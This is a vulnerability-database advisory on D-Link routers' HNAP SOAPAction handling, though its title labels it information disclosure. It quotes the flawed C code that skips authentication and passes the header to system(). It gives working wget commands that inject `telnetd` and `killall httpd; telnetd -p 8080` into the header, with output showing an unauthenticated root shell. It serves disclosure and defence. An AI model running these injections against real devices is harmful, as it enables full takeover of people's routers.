D-link DIR-890L HNAP 未授权信息泄漏漏洞

基本字段

漏洞编号：: SSV-89628

披露/发现时间：: 2015-10-10

提交时间：: 2015-10-10

漏洞等级：

漏洞类别：: 信息泄漏

影响组件：: D-LINK

漏洞作者：: 未知

提交者：: huakai

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 huakai 共获得 1.35KB

HNAP(Home Network Administration Protocol,家庭网络管理协议)是一种基于SOAP(Simple Object Access Protocol,简单对象管理协议)的协议，和UPnP很像，通常被D-Link的”EZ”设置程序用来初始化设置路由器。存在问题代码： ``` /* Grab a pointer to the SOAPAction header */ SOAPAction = getenv("HTTP_SOAPACTION"); /* Skip authentication if the SOAPAction header contains "http://purenetworks.com/HNAP1/GetDeviceSettings" */ if(strstr(SOAPAction, "http://purenetworks.com/HNAP1/GetDeviceSettings") == NULL) { /* do auth check */ } /* Do a reverse search for the last forward slash in the SOAPAction header */ SOAPAction = strrchr(SOAPAction, '/'); if(SOAPAction != NULL) { /* Point the SOAPAction pointer one byte beyond the last forward slash */ SOAPAction += 1; /* Get rid of any trailing double quotes */ if(SOAPAction[strlen(SOAPAction)-1] == '"') { SOAPAction[strlen(SOAPAction)-1] = '\0'; } } else { goto failure_condition; } /* Build the command using the specified SOAPAction string and execute it */ sprintf(command, "sh %s%s.sh > /dev/console", "/var/run/", SOAPAction); system(command); ``` 这里可以得到两个要点： 1. 如果在SOAPaction头部包含字符串http://purenetworks.com/HNAP1/GetDeviceSettings的话，就没有了认证检测； 2. 被传递到sprintf(最终是system)的字符串是SOAPAction头部最后一个前斜线后面的所有内容。因此，我们可以很容易地格式化一个SOAPAction头部来同时满足没有认证检测，同时允许我们传递任意字符串给system： SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`" 这个部分–http://purenetworks.com/HNAP1/GetDeviceSettings满足率没有认证检测，同时reboot字符串被传递给了system： ``system("sh /var/run/`reboot`.sh > /dev/console");`` 如果把reboot替换为telnetd，这将会使得远程的服务器提供一个未经认证的root shell： ``` $ wget --header='SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`"' http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter 'help' for a list of built-in commands. # ``` 如果远程管理功能被启用的话，HNAP请求就可以通过WAN使远程漏洞利用成为现实。当然，路由器的防火墙也许会阻止那些从WAN过来的telnet连接；一种简单的解决方式就是关掉HTTP服务，把telnet服务植入到HTTP所使用的端口上： ``` $ wget --header='SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`killall httpd; telnetd -p 8080`"' http://1.2.3.4:8080/HNAP1 $ telnet 1.2.3.4 8080 Trying 1.2.3.4... Connected to 1.2.3.4. Escape character is '^]'. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter 'help' for a list of built-in commands. # ``` 存在漏洞设备 ``` DAP-1522 revB DAP-1650 revB DIR-880L DIR-865L DIR-860L revA DIR-860L revB DIR-815 revB DIR-300 revB DIR-600 revB DIR-645 TEW-751DR TEW-733GR ```